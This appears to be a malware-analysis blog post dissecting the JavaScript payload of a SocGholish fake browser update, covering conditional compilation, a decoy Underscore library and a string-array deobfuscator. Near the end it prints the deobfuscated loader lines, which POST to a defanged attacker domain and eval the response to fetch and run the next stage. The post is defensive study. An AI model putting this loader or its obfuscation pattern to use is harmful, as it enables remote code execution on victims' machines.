In the previous post, “SocGholish Series - Part 1”, I examined an infected website which claimed to require a browser update in order to properly function. Users who clicked on the download button would receive a JavaScript file to run on their system which would “update their browser”. I walked through the steps leading up to the download, and in this post will pick up where I left off and delve into the contents of the JavaScript payload.


First Look At The Payload

Cracking the JavaScript download open in SublimeText, it seems to be quite large and crammed together.

actual_first

To make it easier to read, I ran it through an online JS beautifier, and turns out with the additional newlines and spaces, it is 1,115 lines long.

first

When first looking at this, I saw what I thought were a few JavaScript block comments in the first line. After some Googling, I discovered these comments were actually conditional compilation keywords in JScript, the “Microsoft version” of JavaScript native to Windows. Checking some old documentation, conditional compilation allows for control of a script depending on the values of the conditional compilation variables. The @cc_on keyword activates conditional compilation support, and the @if and @else keywords function as a standard if/else statement.

The if statement in this sample checks the JScript version on the device and if the version is 4 or greater, enter the if statement, otherwise go into the very lengthy else statement.

Regarding the else statement - it is over 1,000 lines long and appears somewhat obfuscated. While the obfuscation is not particularly heavy, the process of renaming variables and functions to random characters (as seen in the above screenshot) was continued throughout. To avoid manually deobfuscating 1,000 lines of JavaScript, I opted to take a few strings which didn’t appear to be altered and Google them. Bingo - I found a JavaScript library called Underscore which very closely matches the code in the else statement.

underscore

Interesting, why would this be included as part of the downloaded “fake update” JavaScript payload? Scrolling quickly through the code, it does not appear to do anything overtly malicious. Running the code contained in the else statement through any.run doesn’t show any obvious malicious indicators either. All the code in the else statement seems to do is take the Underscore library, turn it into a function, and call the function in-place.

Another factor to weight is the else statement itself. The Underscore function code is only called if the device is running a JScript version older than 4.0. For reference, JScript version 4.0 was released in the late 1990s. It doesn’t seem likely this payload would find itself on many devices with such an old version of JScript running.

If we consider these two statements to be true:

  • The else section is not malicious (with the caveat that very light analysis was done to prove this)
  • The else section is not likely to ever be entered

a few logical explanations remain regarding the code in the else statement.

  • It was was included to increase the size of the download, possibly making it seem more legitimate.
  • The addition of “legitimate” code may have been an attempt at avoiding AV or other detection.
  • The mild obfuscation may have been an attempt to slow down or confuse researchers.

While these are all legitimate possibilities, to be quite honest, I am not sure why the content of the else statement was included. I may be missing something which a more seasoned analyst might have picked up on. Regardless, let’s move on to the content of the if statement, where it seems the action is.

Jumping Into The IF Statement

Below is the original content of the if statement in all its obfuscated glory, structurally beautified for easier reading. This is the section of code which would execute when a victim tried to update their browser by running the Update.js download (and had JScript 4.0 or greater).

if_statement

I worked my way through the content of the if statement in SublimeText, performing text replacement on variables and functions to create more descriptive labels.

if_cleaned

Before I dive into some analysis, I will say I am not a JavaScript guru. In fact, many aspects of JS are a mystery to me. I do a lot of trial and error in Node on my Linux box to try and figure out what certain operators or snippets of code may do. With that said, I may be unable to give the real nitty-gritty technical reason as to why certain statements behaved the way they did, but I will present my best guess based on some testing, Googling, and common sense.

I’m going to jump around a bit, starting with a function toward the bottom on lines 114-120, which I’ve renamed to get_array().

function get_array() {
    var array = [<array_values>];
    get_array = function() {
        return array;
    };
    return get_array();
}

The function starts out by creating an array filled with random strings appear to be base64 encoded, but don’t decode to anything intelligible when testing manually.
Next, the function redefines itself using something known in JavaScript as the Lazy Function Definition Pattern. To summarize, when the function is called for the first time, it creates and returns the array variable. The next n times the function is called, it only returns the array variable, and it is not recreated each time. If the array is updated in any way, these updates are permanent.

Moving back to lines 1-47, an anonymous, self-invoking function expression. JavaScript allows for functions to self-invoke, meaning they are called automatically, immediately after initialization with no need for function calls. Arguments are passed in via the parenthesis immediately following the function definition.

(function(arg_get_array, _0x585212) {
    var strings_object = {
            _0x4e081b: 'gDB%',
            _0x4c3fe3: 0x3f6,
            _0x5f22db: 'PSgS',
            _0x4a3d3f: 0x3ea,
            _0x53d10b: 'YZM3',
            _0x1abe2b: 0x3ed,
            _0x38e02a: 'T^0n',
            _0x2eb8e4: 0x3eb,
            _0x234973: 'XVoi',
            _0x37e27f: 0x3e6,
            _0x6c65c0: 'KcYo',
            _0x259809: 0x3e4,
            _0x1c3c75: 'MW92',
            _0x560688: 0x3df,
            _0x23f8ea: 'YZM3',
            _0x185e90: 0x3dc,
            _0x4a0b3f: '7#tp',
            _0x5af55a: 0x3da,
            _0x50eac5: '$&p#',
            _0x3f2c12: 0x3f8,
            _0x49bff8: 'R6OA',
            _0x540725: 0x3fc
        },
        solo_object = {
            _0x2bd82d: 0x238
        },
        sub_get_array = arg_get_array();

    //passes arg2 minus 568 and arg1 to the deobfuscator() function and returns the result
    function call_deobf(arg1, arg2) {
        return deobfuscator(arg2 - solo_object._0x2bd82d, arg1);
    }

    while (!![]) {
        try {
            var _0x4e9611 = parseInt(call_deobf(strings_object._0x4e081b, strings_object._0x4c3fe3)) / 0x1 * (-parseInt(call_deobf(strings_object._0x5f22db, strings_object._0x4a3d3f)) / 0x2) + parseInt(call_deobf(strings_object._0x53d10b, strings_object._0x1abe2b)) / 0x3 + parseInt(call_deobf(strings_object._0x38e02a, strings_object._0x2eb8e4)) / 0x4 * (-parseInt(call_deobf(strings_object._0x234973, strings_object._0x37e27f)) / 0x5) + parseInt(call_deobf(strings_object._0x6c65c0, strings_object._0x259809)) / 0x6 * (-parseInt(call_deobf(strings_object._0x1c3c75, strings_object._0x560688)) / 0x7) + -parseInt(call_deobf(strings_object._0x23f8ea, strings_object._0x185e90)) / 0x8 + parseInt(call_deobf(strings_object._0x4a0b3f, strings_object._0x5af55a)) / 0x9 + -parseInt(call_deobf(strings_object._0x50eac5, strings_object._0x3f2c12)) / 0xa * (-parseInt(call_deobf(strings_object._0x49bff8, strings_object._0x540725)) / 0xb);
            
            //if result of above = 964931, then break and stop shifting array
            if (_0x4e9611 === _0x585212) break;
            else sub_get_array['push'](sub_get_array['shift']());
        } catch (_0x3f5ce4) {
            sub_get_array['push'](sub_get_array['shift']());
        }
    }
}(get_array, 0xeb943));

There are two arguments passed to the anonymous function, the get_array function and the value 0xeb943, which converting from base16 to base10 is 964931.
The first thing the function does is define an object containing a set of key-value pairs. Looking closely at the KVs, they appear to follow a pattern: a random string and then a number in base16.

The function then defines another object with a single key-value pair, with a value of 568 in base16. Next, the function assigns the get_array function (passed in as an argument) to sub_get_array.

After the variable creations are complete, a new function called call_deobf is created. The purpose of call_deobf is to take two arguments, subtract 568 from the second argument, and pass them both to another function, deobfuscator(). The deobfuscator function can be found in the previous screenshot from lines 62-112, and I’ll go into detail regarding it in a separate section. For now, it is enough to know it returns a deobfuscated element from the array defined in get_array.

Up next, the while loop on line 36. In JavaScript, everything except for a specific list of items (0, -0, null, etc.) is considered “truthy”, meaning considered true when encountered in a boolean context. Thus, in JavaScript [] is truthy, and a double negation of a truthy value is also truthy. Therefore, this is a “while true” loop.

    while (!![]) {
        try {
            var while_breaker = parseInt(call_deobf(array_strings._0x4e081b, array_strings._0x4c3fe3)) / 0x1 * (-parseInt(call_deobf(array_strings._0x5f22db, array_strings._0x4a3d3f)) / 0x2) + parseInt(call_deobf(array_strings._0x53d10b, array_strings._0x1abe2b)) / 0x3 + parseInt(call_deobf(array_strings._0x38e02a, array_strings._0x2eb8e4)) / 0x4 * (-parseInt(call_deobf(array_strings._0x234973, array_strings._0x37e27f)) / 0x5) + parseInt(call_deobf(array_strings._0x6c65c0, array_strings._0x259809)) / 0x6 * (-parseInt(call_deobf(array_strings._0x1c3c75, array_strings._0x560688)) / 0x7) + -parseInt(call_deobf(array_strings._0x23f8ea, array_strings._0x185e90)) / 0x8 + parseInt(call_deobf(array_strings._0x4a0b3f, array_strings._0x5af55a)) / 0x9 + -parseInt(call_deobf(array_strings._0x50eac5, array_strings._0x3f2c12)) / 0xa * (-parseInt(call_deobf(array_strings._0x49bff8, array_strings._0x540725)) / 0xb);
            
            //if result of above == 964931, then break and stop shifting array
            if (while_breaker === _0x585212) break;
            else sub_get_array['push'](sub_get_array['shift']());
        } catch (_0x3f5ce4) {
            sub_get_array['push'](sub_get_array['shift']());
        }
    } 

Starting in the try statement, the first thing the while loop does is create a variable, while_breaker, whose value is the result of a long, complex series of arithmetic operations and function calls. The following if statement checks to see whether while_breaker is strictly equal to the second argument of the main function, the number 964931.
If they are equal, the while loop breaks and the end of the self-invoked function is reached. If they are not equal, the array removes its first element and passes the element to an invocation of “push” – effectively rotating the array by moving the first element of the array to the end of the array.
If anything in the try statement fails, the array is still shifted in the catch statement.

In effect, the entire purpose of the self-invoked function is to take the array created by get_array and rotate it X number of times. When, and only when, it has been rotated the correct number of times will the while_breaker value be set to 964931 and the while loop break.

Moving on to the next important piece of the puzzle, the deobfuscator function.

Deobfuscator Function And Beyond

I cleaned and notated the deobfuscator function enough to understand the basic behavior, but I will admit, there are some sections in which I did not spend a lot of time in the weeds. Specifically, the two functions defined within deobfuscator on lines 68 and 80, and their respective for-loops. In this case, it was enough to understand they perform “some action” on the arguments passed to them. No deep dive into the specific for-loop shenanigans necessary.
With that said, I have provided comments as to my understanding of the deobfuscator function in the code screenshot, if interested. The quick and dirty explanation: using the numeric_arg, the function grabs a value from the get_array array. It modifies the array_value variable using a more complex series of functions, and returns a value.

Now we can finally get to the payload finale, the real important stuff – lines 50, 51, 52, and 122.

var activex_object = new ActiveXObject(call_deobf_2('7FM9', 0x2a1) + call_deobf_2('@f0l', 0x2a3));
activex_object[call_deobf_2('@f0l', 0x293)](call_deobf_2('7#tp', 0x28a), call_deobf_2('Yu2X', 0x2a0) + call_deobf_2('Fo89', 0x2ab) + call_deobf_2('HSRT', 0x2a9) + call_deobf_2('jlDe', 0x29f) + call_deobf_2('oRu9', 0x287), ![]), 
activex_object[call_deobf_2('HC5I', 0x285) + call_deobf_2(')X0A', 0x2a7)](call_deobf_2('O)P#', 0x2aa) + call_deobf_2('HSRT', 0x2ac) + call_deobf_2('@9eY', 0x28e), '1');

Starting with the first two lines, we can see a variable of type ActiveXObject is being created, but the argument passed in is the result of two function calls. How can we determine what this value may be?

Since I know the purposes of the get_array and deobfuscator functions are “benign” (not directly executing malicious code), I can start up a Node REPL (Read-Eval-Print-Loop) session to play with the JavaScript dynamically. To do this, simply enter node in the command prompt, provided Node.js is installed on the device.

Once here, I pasted the two functions into REPL, as it will save functions for the duration of the session.
Then, I pasted the entire anonymous, self-invoking function into REPL as well, since I know all it does it rotate the array. Perfect, now all we need to do is paste lines 54-59 (a function which calls deobfuscator I named call_deobf_2) into REPL and I can start manually deobfuscating.

node_example

So, now we know line 50 is actually

var activex_object = new ActiveXObject('MSXML2.XMLHTTP')

and is how to define an XMLHTTP object, which provides client-side protocol support for communication with HTTP servers.

Performing the same action, the remaining three lines are (intentionally defanged)

51: activex_object['open']('POST', 'https://e9171.asset.tradingvein[.]xyz/subscribeEvent', ![]), 
52: activex_object['setRequestHeader']('Upgrade-Insecure-Requests', '1');
122: activex_object['send']('0fLZsUtGNjQj6htMDKjCPOqLbq6CaK8DLSt7/ur7qQ=='), this['eval'](activex_object['responseText']);

We’ve done it! Line 51 initializes a non-asynchronous POST request to a new domain and line 52 sets the Upgrade-Insecure-Requests header to 1, so HTTP will not be used as a fallback if HTTPS fails. Finally, line 122 sends a base64 encoded string to the domain and executes what is returned in the responseText.

Line 122 is the transition into the next stage of infection. The eval statement causes the immediate execution of whatever is passed to it, and will be done so in the context of the current code, meaning any currently declared functions and variables will be usable by the new code. It is safe to assume the responseText will contain more JavaScript.

Summary

When it boils down, the entire payload could have been written in a handful of lines – the obfuscation techniques and the distracting Underscore library composed the bulk of the payload.

Even though it is not necessary for defense or quick analysis, I enjoy doing deep dives on samples such as these to really understanding the inner workings. Chalk it up to perfectionism, but I usually learn quite a few things while doing so, and it is a great way to build up skills.

Unfortunately, I did not execute the payload on my VM so this is as far as I can go for now.
I plan on running through the attack chain once again, but next time taking it a few steps further.
Look for a part three in the future where I will capture and analyze the next phases.